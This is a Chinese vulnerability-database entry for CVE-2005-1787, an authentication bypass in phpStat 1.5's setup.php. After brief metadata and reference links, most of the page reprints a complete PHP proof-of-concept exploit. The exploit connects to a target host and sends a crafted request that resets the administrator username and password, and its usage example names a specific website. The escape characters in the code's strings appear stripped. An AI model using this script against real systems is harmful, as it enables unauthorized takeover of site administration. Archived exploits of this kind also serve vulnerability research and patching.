phpStat漏洞-安全小百科

phpStat漏洞

漏洞ID	1108824	漏洞类型	输入验证
发布时间	2005-05-30	更新时间	2005-05-30
CVE编号	CVE-2005-1787	CNNVD-ID	CNNVD-200505-1216
漏洞平台	PHP	CVSS评分	7.5

|漏洞来源

https://www.exploit-db.com/exploits/1018
https://www.securityfocus.com/bid/89927
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1216

|漏洞详情

phpStat1.5中的setup.phh允许远程攻击者通过设置$check变量来绕过认证并获取管理员权限。

|漏洞EXP

<?

/*

**************************************************************
PHP Stat Administrative User Authentication Bypass POC Exploit
     Code by Nikyt0x - Soulblack Security Research
**************************************************************

Advisory: 
 http://www.soulblack.com.ar/repo/papers/phpstat_advisory.txt

Saludos:                                        
   Soulblack Staff, Status-x, NeosecurityTeam,
   KingMetal, SWP, Trespasser...

[email protected]
http://www.nikyt0x.tk

**************************************************************
**This Exploit Change Admin Username and Password
**Username: admin
**Password: admin
**************************************************************


php sbphpstatpoc.php www.spazfarm.com /spazstats/setup.php

          ==============================================================
          PHP Stat Administrative User Authentication Bypass POC Exploit
          ==============================================================
                     by Nikyt0x - Soulblack Security Research

     [+] Testing: www.spazfarm.com
     [+] Socket
     [+] Sending Exploit
     [+] OK

     Open www.spazfarm.com/spazstats/setup.php

     Username: admin
     Password: 123456

**************************************************************
*/

// username and password

$username = "admin";
$password = "123456";

function sh0w()
{
echo "n          ==============================================================n";
echo "          PHP Stat Administrative User Authentication Bypass POC Exploitn";
echo "          ==============================================================n";
echo "                     by Nikyt0x - Soulblack Security Researchnn";
}

if ($argc != 3)
{
sh0w();
echo "nn          Usage:n                   sbphpstatpoc.php www.site.com /dir/to/setup.phpn";
exit();
}


if(!ereg('setup.php',$argv[2])) {
   echo "URL to setup.php Incorrect.n";
   exit(0);
}

sh0w();

echo "     [+] Testing: $argv[1]n";

$s0ck3t = fsockopen($argv[1], 80);

if (!$s0ck3t) {
   echo "     [-] Socketn";
   exit(0);
} else {

    $petici0n  = "GET $argv[2]?check=yes&username=$username&password=$password HTTP/1.1rn";
    $petici0n .= "Host: $argv[1]rn";
    $petici0n .= "Connection: Closernrn";
   
   echo "     [+] Socketn";

if(!fwrite($s0ck3t, $petici0n))
   {
   echo "     [-] Sending Exploitn";
   exit(0);
   }
echo "     [+] Sending Exploitn";

 while (!feof($s0ck3t)) {
       $g3tdata = fgets($s0ck3t, 1024);
	   if (eregi('Setup has been updated',$g3tdata))
	   {
	   echo "     [+] OKnn";
           echo "     Open $argv[1]$argv[2]nn     Username: $usernamen     Password: $passwordn";
           exit();
           }

}
fclose($s0ck3t);
}

?>

# milw0rm.com [2005-05-30]

|受影响的产品

phpStat phpStat 0

|参考资料

来源:MISC
链接:http://www.soulblack.com.ar/repo/tools/sbphpstatpoc.txt
来源:MISC
链接:http://www.soulblack.com.ar/repo/papers/advisory/PhpStat_advisory.txt
来源:SECTRACK
名称:1014064
链接:http://securitytracker.com/id?1014064
来源:BUGTRAQ
名称:20050527PHPStatAdministrativeUserAuthenticationBypass
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111721290726958&w;=2
来源:SECUNIA
名称:15516
链接:http://secunia.com/advisories/15516

相关推荐: Xitami敏感信息受到威胁

Xitami敏感信息受到威胁漏洞ID 1206095 漏洞类型未知发布时间 2000-12-31 更新时间 2000-12-31 CVE编号 CVE-2000-1225 CNNVD-ID CNNVD-200012-210 漏洞平台 N/A CVSS评分 …

文章版权归作者所有，未经允许请勿转载。

THE END